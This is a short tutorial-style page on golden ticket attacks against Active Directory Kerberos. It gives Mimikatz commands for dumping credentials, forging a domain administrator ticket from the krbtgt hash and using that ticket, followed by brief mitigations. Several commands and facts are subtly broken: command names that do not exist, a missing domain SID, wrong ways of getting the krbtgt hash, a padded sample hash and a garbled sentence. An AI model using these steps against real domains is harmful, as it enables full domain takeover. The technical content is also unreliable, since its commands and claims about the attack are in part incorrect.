Golden Tickets
The golden ticket is a critical exploit in Kerberos-based authentication systems, allowing an attacker to impersonate a domain administrator by leveraging the krbtgt account hash. This hash, stored in Active Directory's database (NTDS.dit), is used to issue tickets for all users and services. Compromising it enables the creation of forged Kerberos tickets that can be used to access any resource within the domain, making it one of the most dangerous attack vectors in Active Directory environments.
Prerequisites for Golden Ticket Creation¶
To generate a golden ticket, an attacker must:
1. Obtain the krbtgt hash (e.g., via Pass-the-Hash, Kerberoast, or dumping Active Directory's database).
2. Have access to a machine on the same network or with administrative privileges to execute commands.
3. Use a tool capable of generating Kerberos tickets from the hash (e.g., Mimikatz, Impacket, or custom scripts).
Golden Ticket Creation Process¶
The golden ticket is created by using the krbtgt hash to generate a forged Kerberos ticket granting ticket (TGT) for the domain administrator. This ticket can then be used to impersonate any user or service.
Example: Generating a Golden Ticket with Mimikatz¶
# Extract the krbtgt hash (example using Pass-the-Hash)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
# Use the krbtgt hash to create a golden ticket
mimikatz # kerberos::ticket /create /user:Administrator /domain:example.com /hash:krbtgt_hash
krbtgt_hash with the actual hash (e.g., aad3b435b51404eeaad3b435b51404ee:018c83a8a8d64d6a8d6a8d6a8d6a8d6a).
Using the Golden Ticket¶
Once created, the golden ticket can be used to authenticate to services or resources without needing the victim's credentials.
Example: Accessing a File Share¶
# Use the golden ticket to access a share (requires Kerberos authentication)
Invoke-Mimikatz -Command "kerberos::tgs-rept /user:Administrator /domain:example.com /hash:krbtgt_hash"
Example: Impersonating a User¶
# Use the ticket to impersonate a user and access a service
mimikatz # kerberos::tgs-rept /user:Administrator /domain:example.com /hash:krbtgt
Implications and Mitigations¶
- Impact: Golden tickets are valid indefinitely (until the krbtgt account is reset), enabling long-term persistence.
- Detection: Monitor for unauthorized ticket creation, unusual Kerberos activity, or unexpected access to sensitive resources.
- Mitigation:
- Enforce strong password policies for the krbtgt account.
- Regularly rotate krbtgt passwords.
- Deploy Kerberos monitoring tools to detect anomalous ticket requests.
Key takeaways¶
- A golden ticket allows impersonation of domain administrators using the krbtgt hash.
- Tools like Mimikatz are commonly used to generate and exploit golden tickets.
- Detection requires monitoring Kerberos activity and enforcing strict password policies.
- Golden tickets pose a severe risk due to their long validity and broad access privileges.
- Mitigation involves regular krbtgt password rotation and advanced monitoring.